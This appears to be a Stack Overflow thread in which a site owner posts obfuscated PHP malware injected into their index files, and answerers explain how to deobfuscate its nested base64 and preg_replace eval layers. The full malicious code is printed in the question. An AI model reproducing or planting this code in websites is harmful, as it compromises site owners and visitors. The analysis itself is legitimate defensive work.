# how can i decode this malware PHP script?

Tags: php, malware

I just notice all of my index file are having following code in my server. I would like to know how can i decode this. and find out who is behind with this code? please can you help me how to decode this.

```
    <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
```

Comment: Look into base64_decode -> http://php.net/base64-decode

Comment: Please tell which PHP application(s) you are running on your server.

Comment: @hakre: Take a guess.  It's probably Wordpress.

Answer (score 5, accepted):

1. Properly indent the code (I used http://beta.phpformatter.com/)

   > http://pastebin.com/A106eFjY
2. Look for function calls (`func()` or `$func()`).

   > Line 14: `**$eva1tYldokBcVSjr**(..., **$eva1tYldakBcVSir**(...));
3. Comment out the function call, and `echo $eva1tYldokBcVSjr` (and `$eva1tYldakBcVSir`) to see what it's doing.

   > `echo $eva1tYldokBcVSjr;` => `'preg_replace'`
   >   `echo $eva1tYldakBcVSir;`=> `'strrev'`
4. `echo` out the parameters passed to `$eva1tYldokBcVSjr()` (`preg_replace()`).

   > `$eva1tYidokBcVSjr[0.016 * (7812.5 * 0.016)]` => `"@(.+)@ie"`
   >   `$eva1tYidokBcVSjr[62.5 * 0.016]` => `"eval("\1");"`
   >   `strrev($eva1tYidokBcVSjr[0.061 * 0.031])` => `"@eval(base64_decode($eva1tYidakBcVSjr[1]));"`

So line 14 decodes to (in a PHP regex anything can be a delimiter):

```
preg_replace("/(.+)/ie", 'eval("\1");', eval(base64_decode($eva1tYidakBcVSjr[1])));
```

The string that's being `base64_decoded` decodes to code with a bunch of `eval`s in it.

> http://pastebin.com/zRr9dMHN

Replace all those `eval`s with `echo`s, to see what's going on.  There are *even more* `eval(base64_decode(`s.

> http://pastebin.com/H9WcBFyJ

Changing *those* `eval`s to `echo`s gets you this:

> http://pastebin.com/VaYCgUyK

I see a `setcookie` in there...

**EDIT**: Here's a post where someone continued decoding this:

> http://www.thehosthelpers.com/technical-help/help-de-obfsucating-code/msg17585#msg17585

Comment: *sigh* Why did I actually do that?

Answer (score 0):

Code doesn't work at a one-to-one relationship. You can write any number of different codes to the same end. Because of this, de-obfuscating code is very difficult. You can try using some de-obfuscation extensions [like this one](http://research.zscaler.com/2010/10/php-deobfuscation.html), but I wouldn't get my hopes up on getting legible code back. Also, if the hacker is smart, he'll have used a number of redirects and other measures to make sure you can't track him even if you de-obfuscated the code.

Answer (score 0):

I immediately found pages like this on Google:

http://blog.sucuri.net/2011/10/evil-backdoors-part-ii.html

And it is also already asked here:

[PHP Script in my Wordpress Files. Please Decode or Help Me Remove it](https://stackoverflow.com/questions/8046971/php-script-in-my-wordpress-files-please-decode-or-help-me-remove-it)

Answer (score 0):

Ignore the first long variable ($eva1fYlbakBcVSir).  You can go through and echo the other vars, which are written using escape sequences, and then you can decipher the rest of the code.